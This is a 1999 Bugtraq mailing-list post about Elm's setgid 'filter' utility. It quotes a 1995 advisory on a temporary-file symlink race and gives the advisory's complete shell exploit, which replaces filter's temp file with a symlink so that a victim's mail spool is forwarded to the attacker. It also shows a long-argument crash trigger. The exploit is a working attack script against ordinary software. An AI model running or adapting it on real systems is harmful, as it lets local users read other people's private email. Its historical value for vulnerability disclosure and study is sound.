Bugtraq mailing list archives

elm filter program

From: krasel () WPXX02 TOXI UNI-WUERZBURG DE (Cornelius Krasel)
Date: Sun, 12 Sep 1999 19:08:59 +0200


Mark Ultor wrote:

I've found a bug in filter on Elm 2.4 PL25. filter got SGID on mail group.

sowatech:~$ filter -f `perl -e ' print "A" x 5000'`
Segmentation fault


"filter" is inherently unsafe. A bug has been described in 1995 which
allows reading email of anybody on the system. The description can be
found in the BugTraq archives, I believe. I include the full message
below. While it was written in 1995, it still works with the filter
version of Elm 2.4ME+ PL35 (25) which is from 1997. (I don't know
whether there are any more recent elm versions.)

--Cornelius.

------cut here-------

                      filter (elm package) security hole

   David J Meltzer (davem+ () andrew cmu edu)
   Tue, 26 Dec 1995 15:07:49 -0500

     * Messages sorted by: [ date ][ thread ][ subject ][ author ]
     * Previous message: Scott Chasin: "Happy Holidays"

   The elm filter under linux runs sugrp mail, thus allowing it to freely
read and write from users mail spools.  It is only through the integrity
of its code that the security of linux's mail system is protected; and in
this respect it falls short.  The failure of the filter program to properly
handle temporary files allows a user to read or write to any user's mail
spool, a significant security hole.
   The specific problem that is exploited in this hole is the way filter
uses a temporary file to store the input to it, and then subsequently send
it back out according to the filter.  Because of the modularity of the
coding, in the main filter.c, the temporary file is opened, and then written
to; after which it is closed.  The mailmessage function is then called, with
the purpose of forwarding that mail, written to the temporary file, to
whatever destination is specified in the filter.  At the start of this
process, the temporary file is opened, and the contents of it are dumped
to the mail spool of the user the mail is being forwarded to.
   At any point after the file has been initially opened by the main filter
function, since the user running filter has permissions on that temp file,
it can be rm'd.  The temp file existing can then be replaced with a symbolic
link to any file that group mail has read permissions on.  When it is opened
in the mailmessage function, the symbolic link is followed and whatever file
that was pointed to will be read in, and the contents forwarded to the user
specified in the mail spool.

   The complete exploits are shown below:

                   Program: filter, an elm utility
Affected Operating Systems: linux - Slackware 3.0, others with sgid mail filter
              Requirements: account on machine
       Security Compromise: user can read any mail spool readable by grp mail.
                            (usually everything, sometimes not root)
                    Author: Dave M. (davem () cmu edu)
                  Synopsis: filter writes out the mail to be forwarded to a
                            temporary file, which is then closed and reopened;
                            if when the temporary file is reopened it is a
                            symlink to a mail spool, filter will proceed
                            to forward the contents of that file as if it was
                            the original message.

------cut here-------

#!/bin/sh
# This shell script exploits a problem with filter(1L)
# it will follow symbolic links, on a read allowing
# us to steal a users mail file.
#
# Usage: fread.sh victimsusername
#
# Contents will be stored in ~/victimsusername.mail
#
# Dave M. (davem () cmu edu)
#

cp /var/spool/mail/$LOGNAME ~
cp /dev/null /var/spool/mail/$LOGNAME
echo 'if (always) forward' $LOGNAME > /tmp/fread-ftr.tmp

cat << _EOF_ >> /tmp/fread-msg.tmp
From: Dave
To: $LOGNAME
Subject: Filter Exploit

_EOF_

echo sleep 2 > /tmp/fread-sh.tmp
echo cat /tmp/fread-msg.tmp >> /tmp/fread-sh.tmp
chmod +x /tmp/fread-sh.tmp
/tmp/fread-sh.tmp|filter -f /tmp/fread-ftr.tmp &
FREAD=`ps|grep 'filter -f'|grep -v grep|awk '{print $1}'`
rm -f /tmp/filter.$FREAD
ln -s /var/spool/mail/$1 /tmp/filter.$FREAD
sleep 2
rm -f /tmp/fread-ftr.tmp /tmp/fread-msg.tmp /tmp/fread-sh.tmp
/tmp/fread-ftr.tmp /tmp/filter.$FREAD
FREAD=
cp /var/spool/mail/$LOGNAME ~/$1.mail
cp ~/$LOGNAME /var/spool/mail
more ~/$1.mail

Current thread:

(no subject) Mark Ultor (Sep 09)
- Re: your mail KSR[T] Contact Account (Sep 11)
- elm filter program Cornelius Krasel (Sep 12)
  - Hotmail security vulnerability - injecting JavaScript using <STYLE> tag Georgi Guninski (Sep 13)
    - Re: Hotmail security vulnerability - injecting JavaScript using <STYLE> tag Olaf Titz (Sep 14)
    - Re: Hotmail security vulnerability - injecting JavaScript using Alan Cox (Sep 15)
    - Re: Hotmail security vulnerability - injecting JavaScript using<STYLE> tag Georgi Guninski (Sep 15)
    - Re: Hotmail security vulnerability - injecting JavaScript using<STYLE> tag Eivind Eklund (Sep 15)
    - [support_feedback () us-support external hp com: Security Bulletins Digest] Patrick Oonk (Sep 15)
  - Re: elm filter program Bill Pemberton (Sep 13)
  - [RHSA-1999:037-01] Buffer overflow in mars_nwe Bill Nottingham (Sep 13)
- Phrack 55 is on the virtual shelves... Jesse Whyte (Sep 12)